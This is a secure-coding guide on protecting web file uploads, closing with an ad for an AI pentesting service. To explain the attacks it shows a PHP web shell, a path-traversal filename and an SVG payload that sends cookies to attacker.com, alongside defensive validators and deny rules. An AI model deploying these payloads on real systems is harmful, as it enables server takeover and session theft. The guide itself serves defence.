Securing File Upload Functionality

A comprehensive guide to preventing file upload vulnerabilities from content type validation to secure storage.

Introduction to File Upload Security

File upload functionality is one of the most dangerous features in web applications. When improperly secured, it can allow attackers to upload and execute malicious code, overwrite critical files, or store content that attacks other users.

File Upload Vulnerability Types

Remote Code Execution (Shell Upload)

The most severe vulnerability allows attackers to upload and execute server-side code:

<?php
// malicious.php - uploaded by attacker
if(isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd']);
}
?>

Path Traversal via Filename

Attackers manipulate filenames to write outside the upload directory:

# VULNERABLE: Using user-provided filename directly
def upload_file(request):
    uploaded_file = request.files['file']
    filename = uploaded_file.filename  # Could be: ../../../etc/cron.d/backdoor
    filepath = os.path.join('/var/uploads', filename)
    uploaded_file.save(filepath)

Stored XSS via File Content

SVG and HTML files can contain JavaScript that executes when viewed:

<svg xmlns="http://www.w3.org/2000/svg">
  <script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
</svg>

Content Type Validation

Server-Side Content Detection

import magic
 
ALLOWED_TYPES = {
    'image/jpeg': ['.jpg', '.jpeg'],
    'image/png': ['.png'],
    'application/pdf': ['.pdf']
}
 
def validate_content_type(file_path):
    """Detect actual file type from content, not headers."""
    mime = magic.Magic(mime=True)
    detected_type = mime.from_file(file_path)
    
    if detected_type not in ALLOWED_TYPES:
        raise InvalidFileType(f"Detected type {detected_type} not allowed")
    
    return detected_type

File Extension and Magic Byte Checking

ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf'}
DANGEROUS_EXTENSIONS = {'.php', '.phtml', '.asp', '.aspx', '.jsp', '.py', '.sh', '.exe'}
 
def validate_extension(filename):
    """Validate file extension with multiple checks."""
    filename_lower = filename.lower()
    
    # Check for double extensions (shell.php.jpg)
    parts = filename_lower.split('.')
    for ext in ['.' + e for e in parts[1:]]:
        if ext in DANGEROUS_EXTENSIONS:
            raise DangerousExtension(f"Extension {ext} not allowed")
    
    _, ext = os.path.splitext(filename_lower)
    if ext not in ALLOWED_EXTENSIONS:
        raise InvalidExtension(f"Extension {ext} not allowed")
    
    # Check for null byte injection
    if '\x00' in filename:
        raise InvalidFilename("Null bytes not allowed")
    
    return ext
 
# Magic byte verification
MAGIC_BYTES = {
    'image/jpeg': [bytes([0xFF, 0xD8, 0xFF])],
    'image/png': [bytes([0x89, 0x50, 0x4E, 0x47])],
    'application/pdf': [b'%PDF-']
}
 
def validate_magic_bytes(file_path, expected_type):
    with open(file_path, 'rb') as f:
        header = f.read(16)
    
    for signature in MAGIC_BYTES.get(expected_type, []):
        if header.startswith(signature):
            return True
    
    raise InvalidMagicBytes("File does not match expected type")

Polyglot File Detection

Polyglot files are valid in multiple formats simultaneously:

def detect_polyglot(file_path):
    """Detect files containing embedded code."""
    with open(file_path, 'rb') as f:
        content = f.read()
    
    dangerous_patterns = [
        b'<?php', b'<?=', b'<script', b'javascript:', b'onerror='
    ]
    
    for pattern in dangerous_patterns:
        if pattern.lower() in content.lower():
            raise PolyglotDetected("Dangerous content detected in file")

Storage and Execution Prevention

Store Outside Web Root

# WRONG: Storing in web-accessible directory
UPLOAD_DIR = "/var/www/html/uploads"
 
# CORRECT: Store outside web root
UPLOAD_DIR = "/var/app-data/uploads"
 
# Serve via application with proper headers
@app.route('/download/<file_id>')
def download_file(file_id):
    if not re.match(r'^[a-f0-9]{32}\.[a-z]+$', file_id):
        abort(404)
    
    return send_file(
        os.path.join(UPLOAD_DIR, file_id[:2], file_id),
        mimetype='application/octet-stream',
        as_attachment=True
    )

Generate Random Filenames

def generate_storage_path(extension):
    """Generate random, non-guessable storage path."""
    filename = f"{uuid.uuid4().hex}{extension}"
    subdir = filename[:2]
    
    full_path = Path(UPLOAD_DIR) / subdir / filename
    full_path.parent.mkdir(parents=True, exist_ok=True)
    
    return str(full_path)

Nginx Configuration

location /uploads/ {
    alias /var/app-data/uploads/;
    
    # Prevent script execution
    location ~ \.(php|phtml|pl|py|jsp|asp|sh|cgi)$ {
        deny all;
    }
    
    # Force download for dangerous types
    location ~* \.(html?|svg|xml)$ {
        add_header Content-Disposition "attachment";
        add_header X-Content-Type-Options "nosniff";
    }
    
    autoindex off;
}

Secure Archive Handling

import zipfile
from pathlib import Path
 
def safe_extract_zip(archive_path, extract_to, max_files=1000):
    """Safely extract ZIP with path traversal protection."""
    extract_path = Path(extract_to).resolve()
    
    with zipfile.ZipFile(archive_path, 'r') as zf:
        for info in zf.infolist():
            target_path = (extract_path / info.filename).resolve()
            
            # PATH TRAVERSAL PROTECTION
            if not str(target_path).startswith(str(extract_path)):
                raise PathTraversal(f"Path traversal detected: {info.filename}")
            
            if info.is_dir():
                target_path.mkdir(parents=True, exist_ok=True)
            else:
                target_path.parent.mkdir(parents=True, exist_ok=True)
                with zf.open(info) as source, open(target_path, 'wb') as target:
                    target.write(source.read())

Security Checklist

  • Validate file extension against allowlist
  • Verify content type using magic bytes
  • Check for extension/content-type mismatches
  • Scan for embedded code (polyglots)
  • Enforce file size limits
  • Generate random filenames for storage
  • Store files outside web root
  • Set X-Content-Type-Options: nosniff header
  • Disable script execution in upload directories

Automated File Upload Security Testing

File upload vulnerabilities require testing numerous bypass techniques including extension manipulation, content-type spoofing, polyglot files, and path traversal variations.

RedVeil's AI-powered penetration testing platform autonomously tests file upload functionality against known attack patterns, identifies misconfigured storage, and validates whether uploaded files can be executed. Each finding includes proof-of-concept evidence demonstrating actual exploitability.

Test your file upload security with RedVeil →

Ready to run your own test?

Start your first RedVeil pentest in minutes.